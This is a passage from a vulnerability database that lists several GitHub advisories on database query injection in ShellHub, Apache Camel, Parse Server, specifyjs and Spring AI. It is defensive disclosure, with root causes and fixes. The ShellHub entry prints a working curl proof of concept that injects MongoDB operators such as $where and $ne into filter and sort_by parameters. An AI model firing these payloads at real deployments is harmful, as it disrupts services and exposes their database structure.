      "url": "https://github.com/spring-projects/spring-ai/releases/tag/v1.1.4"
    },
    {
      "type": "WEB",
      "url": "https://spring.io/security/cve-2026-22744"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Spring AI Redis Store has TAG Field Query Injection Through Improper Neutralization of Special Characters"
}

GHSA-47R2-V3X6-WFF9

Vulnerability from github – Published: 2026-05-06 23:28 – Updated: 2026-05-14 20:43
VLAI
Summary
ShellHub has crash-DoS via field injection in filter and sort-by parameters
Details

Summary

The device list endpoint accepts user-controlled identifiers in two places that are passed directly as BSON/SQL keys in the database layer without validation:

  1. The name field of each filter property in the base64-encoded filter query parameter.
  2. The sort_by query parameter.

Any authenticated user can craft payloads that cause the aggregation/query to fail and the API to return HTTP 500 with no body, with no rate limiting applied.

Severity

CVSS 3.1: 6.5 (Medium) CWE-20 (Improper Input Validation) CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)

Affected versions

ShellHub Community v0.24.1 (validated). All versions sharing the same filter and sort pipeline (api/store/mongo/query-options.go).

Root cause

Vector 1 — Filter field name

api/store/mongo/query-options.go:140:

go conditions = append(conditions, bson.M{param.Name: property})

param.Name is the name field from the JSON filter supplied by the client. It becomes a BSON map key with no validation, allowing BSON operator names ($where, $ne, $or, $regex) and virtual pipeline-computed fields (namespace, paths containing $) to be injected.

Vector 2 — Sort-by field

Similar pattern in the sort pipeline where the sort_by query parameter is used to build bson.M{"$sort": {sortBy: order}} without validation.

Additional observation

fromContains (api/store/mongo/internal/filters.go:60-69) passes user input directly as $regex value, which enables blind regex extraction over string fields within the caller's tenant and potential ReDoS amplification on large datasets.

go func fromContains(value interface{}) (bson.M, error) { switch value.(type) { case string: return bson.M{"$regex": value, "$options": "i"}, nil

Proof of concept (validated live against v0.24.1)

```bash TOKEN=

# Helper: base64-encode a filter payload encode_filter() { python3 -c 'import json,base64,sys;print(base64.b64encode(json.dumps(json.loads(sys.argv[1])).encode()).decode())' "$1" }

# --- Vector 1: filter field injection ---

# Baseline: legitimate filter -> 200 F=$(encode_filter '[{"type":"property","params":{"name":"name","operator":"contains","value":"anything"}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=200

# Exploit 1a: Mongo operator as field name F=$(encode_filter '[{"type":"property","params":{"name":"$where","operator":"contains","value":"x"}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# Exploit 1b: nested object as value F=$(encode_filter '[{"type":"property","params":{"name":"status","operator":"eq","value":{"$ne":"accepted"}}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# Exploit 1c: pipeline-computed field as filter name F=$(encode_filter '[{"type":"property","params":{"name":"namespace","operator":"contains","value":"."}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# --- Vector 2: sort-by injection ---

# Baseline: legitimate sort -> 200 curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=name" \ -H "Authorization: Bearer $TOKEN" # HTTP=200

# Exploit 2a: Mongo operator as sort field curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=\$where" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# Exploit 2b: path containing $ curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=_id.%24%24%24" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# Exploit 2c: oversized sort field (no length validation) curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=$(python3 -c 'print("A"*5000)')" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# Exploit 2d: non-indexable internal field curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=tenant_id" \ -H "Authorization: Bearer $TOKEN" # HTTP=500

# --- Repeat to demonstrate no rate limiting --- for i in $(seq 1 20); do curl -sS -o /dev/null -w "%{http_code} " "http://target/api/devices?sort_by=\$where" \ -H "Authorization: Bearer $TOKEN" done # 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 ```

Confirmed field values that trigger 500: - Filter name: $where, $regex, $or, $ne, remote_addr, tenant_id, namespace, any path containing $ after a . - Sort-by: $where, _id.$$$, tenant_id, password.hash, overly long strings

Observed response characteristics: HTTP/1.1 500 Internal Server Error Content-Length: 0 X-Request-Id: <id> ← logged as error in backend

Response time 8-18 ms per request, server process stays alive, no degradation across 20 consecutive requests.

Impact

  • Availability (low): unrestricted HTTP 500 generation by any authenticated caller; log noise, SIEM false-positives, WAF bypass fingerprinting.
  • Information disclosure (low): potential stack trace exposure depending on logger configuration; attacker can fingerprint the underlying MongoDB aggregation pipeline and schema.
  • Resource exhaustion (potential): user-controlled $regex value on large tenant datasets enables ReDoS amplification (not reproducible on a 2-device test instance, but attack surface is real on production-scale deployments).
  • Forensics difficulty: unified 500 response makes it hard to distinguish legitimate errors from attacker probes in logs.

Suggested fix

  1. Allowlist filter and sort field names per collection. Add a whitelist of allowed param.Name and sort_by values for each model exposed via filters (device, session, etc.). Reject anything else with HTTP 400.

  2. Reject BSON operators in field names. Even if an allowlist is not practical, reject values that:

    • start with $
    • contain $ after a .
    • contain characters outside [A-Za-z0-9_.]
    • exceed a reasonable length (e.g., 64 characters)
  3. Validate value shape. For contains/eq/ne operators, reject non-primitive values (objects, arrays of objects).

  4. Catch aggregation errors. In api/store/mongo/query-options.go, wrap pipeline execution and return a typed error that the HTTP layer maps to 400 Bad Request instead of 500.

  5. Limit regex complexity. In fromContains, reject regex values longer than N characters or containing nested quantifiers ((...)+, (...)*, (.+)+, etc.) to mitigate ReDoS.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.24.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/shellhub-io/shellhub"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.24.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44425"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-20",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T23:28:05Z",
    "nvd_published_at": "2026-05-13T22:16:44Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nThe device list endpoint accepts user-controlled identifiers in two places that are passed directly as BSON/SQL keys in the database layer without validation:\n\n  1. The `name` field of each filter property in the base64-encoded `filter`\n     query parameter.\n  2. The `sort_by` query parameter.\n\nAny authenticated user can craft payloads that cause the aggregation/query to fail and the API to return HTTP 500 with no body, with no rate limiting applied.\n\n## Severity\n**CVSS 3.1: 6.5 (Medium)** \nCWE-20 (Improper Input Validation) \nCWE-943 (Improper Neutralization of Special Elements in Data Query Logic)\n\n## Affected versions\nShellHub Community v0.24.1 (validated). All versions sharing the same filter and sort pipeline (`api/store/mongo/query-options.go`).\n\n## Root cause\n\n### Vector 1 \u2014 Filter field name\n  `api/store/mongo/query-options.go:140`:\n\n  ```go\n  conditions = append(conditions, bson.M{param.Name: property})\n  ```\n\n`param.Name` is the `name` field from the JSON filter supplied by the client. It becomes a BSON map key with no validation, allowing BSON operator names (`$where`, `$ne`, `$or`, `$regex`) and virtual pipeline-computed fields (`namespace`, paths containing `$`) to be  injected.\n\n### Vector 2 \u2014 Sort-by field\nSimilar pattern in the sort pipeline where the `sort_by` query parameter is used to build `bson.M{\"$sort\": {sortBy: order}}` without validation.\n\n### Additional observation\n`fromContains` (`api/store/mongo/internal/filters.go:60-69`) passes user input directly as `$regex` value, which enables blind regex extraction over string fields within the caller\u0027s tenant and potential ReDoS amplification on large datasets.\n\n  ```go\n  func fromContains(value interface{}) (bson.M, error) {\n      switch value.(type) {\n      case string:\n          return bson.M{\"$regex\": value, \"$options\": \"i\"}, nil\n  ```\n\n## Proof of concept (validated live against v0.24.1)\n\n  ```bash\n  TOKEN=\u003cvalid-user-jwt\u003e\n\n  # Helper: base64-encode a filter payload\n  encode_filter() {\n    python3 -c \u0027import json,base64,sys;print(base64.b64encode(json.dumps(json.loads(sys.argv[1])).encode()).decode())\u0027 \"$1\"\n  }\n\n  # --- Vector 1: filter field injection ---\n\n  # Baseline: legitimate filter -\u003e 200\n  F=$(encode_filter \u0027[{\"type\":\"property\",\"params\":{\"name\":\"name\",\"operator\":\"contains\",\"value\":\"anything\"}}]\u0027)\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?filter=$F\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=200\n\n  # Exploit 1a: Mongo operator as field name\n  F=$(encode_filter \u0027[{\"type\":\"property\",\"params\":{\"name\":\"$where\",\"operator\":\"contains\",\"value\":\"x\"}}]\u0027)\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?filter=$F\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # Exploit 1b: nested object as value\n  F=$(encode_filter \u0027[{\"type\":\"property\",\"params\":{\"name\":\"status\",\"operator\":\"eq\",\"value\":{\"$ne\":\"accepted\"}}}]\u0027)\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?filter=$F\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # Exploit 1c: pipeline-computed field as filter name\n  F=$(encode_filter \u0027[{\"type\":\"property\",\"params\":{\"name\":\"namespace\",\"operator\":\"contains\",\"value\":\".\"}}]\u0027)\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?filter=$F\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # --- Vector 2: sort-by injection ---\n\n  # Baseline: legitimate sort -\u003e 200\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?sort_by=name\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=200\n\n  # Exploit 2a: Mongo operator as sort field\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?sort_by=\\$where\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # Exploit 2b: path containing $\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?sort_by=_id.%24%24%24\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # Exploit 2c: oversized sort field (no length validation)\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?sort_by=$(python3 -c \u0027print(\"A\"*5000)\u0027)\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # Exploit 2d: non-indexable internal field\n  curl -sS -w \"HTTP=%{http_code}\\n\" \"http://target/api/devices?sort_by=tenant_id\" \\\n    -H \"Authorization: Bearer $TOKEN\"\n  # HTTP=500\n\n  # --- Repeat to demonstrate no rate limiting ---\n  for i in $(seq 1 20); do\n    curl -sS -o /dev/null -w \"%{http_code} \" \"http://target/api/devices?sort_by=\\$where\" \\\n      -H \"Authorization: Bearer $TOKEN\"\n  done\n  # 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500\n  ```\n\n  **Confirmed field values that trigger 500:**\n  - Filter name: `$where`, `$regex`, `$or`, `$ne`, `remote_addr`, `tenant_id`, `namespace`, any path containing `$` after a `.`\n  - Sort-by: `$where`, `_id.$$$`, `tenant_id`, `password.hash`, overly long strings\n\n  **Observed response characteristics:**\n  ```\n  HTTP/1.1 500 Internal Server Error\n  Content-Length: 0\n  X-Request-Id: \u003cid\u003e    \u2190 logged as error in backend\n  ```\n\nResponse time 8-18 ms per request, server process stays alive, no degradation across 20 consecutive requests.\n\n## Impact\n  - **Availability (low):** unrestricted HTTP 500 generation by any authenticated caller; log noise, SIEM false-positives, WAF bypass\nfingerprinting.\n  - **Information disclosure (low):** potential stack trace exposure depending on logger configuration; attacker can fingerprint the underlying MongoDB aggregation pipeline and schema.\n  - **Resource exhaustion (potential):** user-controlled `$regex` value on large tenant datasets enables ReDoS amplification (not reproducible on a 2-device test instance, but attack surface is real on production-scale deployments).\n  - **Forensics difficulty:** unified 500 response makes it hard to distinguish legitimate errors from attacker probes in logs.\n\n## Suggested fix\n\n  1. **Allowlist filter and sort field names per collection.** Add a whitelist of allowed `param.Name` and `sort_by` values for each model exposed via filters (`device`, `session`, etc.). Reject anything else with HTTP 400.\n\n  2. **Reject BSON operators in field names.** Even if an allowlist is not practical, reject values that:\n     - start with `$`\n     - contain `$` after a `.`\n     - contain characters outside `[A-Za-z0-9_.]`\n     - exceed a reasonable length (e.g., 64 characters)\n\n  3. **Validate `value` shape.** For `contains`/`eq`/`ne` operators, reject non-primitive values (objects, arrays of objects).\n\n  4. **Catch aggregation errors.** In `api/store/mongo/query-options.go`,  wrap pipeline execution and return a typed error that the HTTP layer maps to 400 Bad Request instead of 500.\n\n  5. **Limit regex complexity.** In `fromContains`, reject regex values longer than N characters or containing nested quantifiers (`(...)+`, `(...)*`, `(.+)+`, etc.) to mitigate ReDoS.",
  "id": "GHSA-47r2-v3x6-wff9",
  "modified": "2026-05-14T20:43:23Z",
  "published": "2026-05-06T23:28:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-47r2-v3x6-wff9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44425"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/shellhub-io/shellhub"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ShellHub has crash-DoS via field injection in filter and sort-by parameters"
}

GHSA-4JRW-64VR-7G8M

Vulnerability from github – Published: 2026-01-14 12:31 – Updated: 2026-01-15 22:33
VLAI
Summary
Apache Camel camel-neo4j component is vulnerable to cypher injection
Details

Cypher Injection vulnerability in Apache Camel camel-neo4j component.

This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0

Users are recommended to upgrade to version 4.10.8 for 4.10.x LTS and 4.14.3 for 4.14.x LTS and 4.17.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.camel:camel-neo4j"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.10.0"
            },
            {
              "fixed": "4.10.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.camel:camel-neo4j"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.14.0"
            },
            {
              "fixed": "4.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.camel:camel-neo4j"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.15.0"
            },
            {
              "fixed": "4.17.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66169"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-89",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-14T21:17:27Z",
    "nvd_published_at": "2026-01-14T12:16:32Z",
    "severity": "MODERATE"
  },
  "details": "Cypher Injection vulnerability in Apache Camel camel-neo4j component.\n\nThis issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.3, from 4.15.0 before 4.17.0\n\nUsers are recommended to upgrade to version 4.10.8 for 4.10.x LTS and 4.14.3 for 4.14.x LTS and 4.17.0.",
  "id": "GHSA-4jrw-64vr-7g8m",
  "modified": "2026-01-15T22:33:18Z",
  "published": "2026-01-14T12:31:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66169"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/camel/pull/20035"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/camel/pull/20036"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/camel/pull/20037"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/camel/commit/66715d3feb4ba15df30cffe437e45efeedfba10d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/camel/commit/723e2cd98ce4b4ceb1dd38837bc113fca0cef170"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/camel/commit/e46c4c0ef542a64dc791253763a8273dfd7fb179"
    },
    {
      "type": "WEB",
      "url": "https://camel.apache.org/security/CVE-2025-66169.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/camel"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/CAMEL-22719"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/01/13/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Apache Camel camel-neo4j component is vulnerable to cypher injection"
}

GHSA-5C7W-4WM3-85VW

Vulnerability from github – Published: 2026-07-02 19:00 – Updated: 2026-07-02 19:00
VLAI
Summary
@asymmetric-effort/specifyjs: GraphQL gql tag allows metacharacter injection
Details

Finding

Location: core/src/client/graphql.ts:66-80

The gql template tag function warned about interpolated values containing GraphQL metacharacters ({}():) but still concatenated them into the query string, enabling potential GraphQL injection.

Status

Fixed in v0.2.136 — The gql function now throws an error when metacharacters are detected in interpolated values, forcing developers to use the variables parameter.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@asymmetric-effort/specifyjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.136"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T19:00:12Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Finding\n\n**Location**: `core/src/client/graphql.ts:66-80`\n\nThe `gql` template tag function warned about interpolated values containing GraphQL metacharacters (`{}():`) but still concatenated them into the query string, enabling potential GraphQL injection.\n\n## Status\n\n**Fixed in v0.2.136** \u2014 The `gql` function now throws an error when metacharacters are detected in interpolated values, forcing developers to use the `variables` parameter.",
  "id": "GHSA-5c7w-4wm3-85vw",
  "modified": "2026-07-02T19:00:12Z",
  "published": "2026-07-02T19:00:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/asymmetric-effort/specifyjs/security/advisories/GHSA-5c7w-4wm3-85vw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/asymmetric-effort/specifyjs/commit/25d1fb491d99479efdf501f5f75e0bb80c908f0a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/asymmetric-effort/specifyjs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@asymmetric-effort/specifyjs: GraphQL gql tag allows metacharacter injection"
}

GHSA-5FW2-8JCV-XH87

Vulnerability from github – Published: 2026-03-12 17:29 – Updated: 2026-03-13 13:36
VLAI
Summary
Parse Server: Account takeover via operator injection in authentication data identifier
Details

Impact

An unauthenticated attacker can take over any user account that was created with an authentication provider that does not validate the format of the user identifier (e.g. anonymous authentication). By sending a crafted login request, the attacker can cause the server to perform a pattern-matching query instead of an exact-match lookup, allowing the attacker to match an existing user and obtain a valid session token for that user's account. Both MongoDB and PostgreSQL database backends are affected. Any Parse Server deployment that allows anonymous authentication (enabled by default) is vulnerable.

Patches

The fix enforces that the user identifier in authentication data is a string before using it in a database query. Non-string values are rejected with a validation error.

Workarounds

There is no known workaround.

References

  • GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-5fw2-8jcv-xh87
  • Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.12
  • Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.38
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "parse-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.6.0-alpha.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "parse-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.6.38"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32248"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-12T17:29:55Z",
    "nvd_published_at": "2026-03-12T20:16:05Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nAn unauthenticated attacker can take over any user account that was created with an authentication provider that does not validate the format of the user identifier (e.g. anonymous authentication). By sending a crafted login request, the attacker can cause the server to perform a pattern-matching query instead of an exact-match lookup, allowing the attacker to match an existing user and obtain a valid session token for that user\u0027s account. Both MongoDB and PostgreSQL database backends are affected. Any Parse Server deployment that allows anonymous authentication (enabled by default) is vulnerable.\n\n### Patches\n\nThe fix enforces that the user identifier in authentication data is a string before using it in a database query. Non-string values are rejected with a validation error.\n\n### Workarounds\n\nThere is no known workaround.\n\n### References\n\n- GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-5fw2-8jcv-xh87\n- Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.12\n- Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.38",
  "id": "GHSA-5fw2-8jcv-xh87",
  "modified": "2026-03-13T13:36:15Z",
  "published": "2026-03-12T17:29:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-5fw2-8jcv-xh87"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32248"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/parse-community/parse-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/releases/tag/8.6.38"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.12"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Parse Server: Account takeover via operator injection in authentication data identifier"
}

No mitigation information available for this CWE.

CAPEC-676: NoSQL Injection

An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.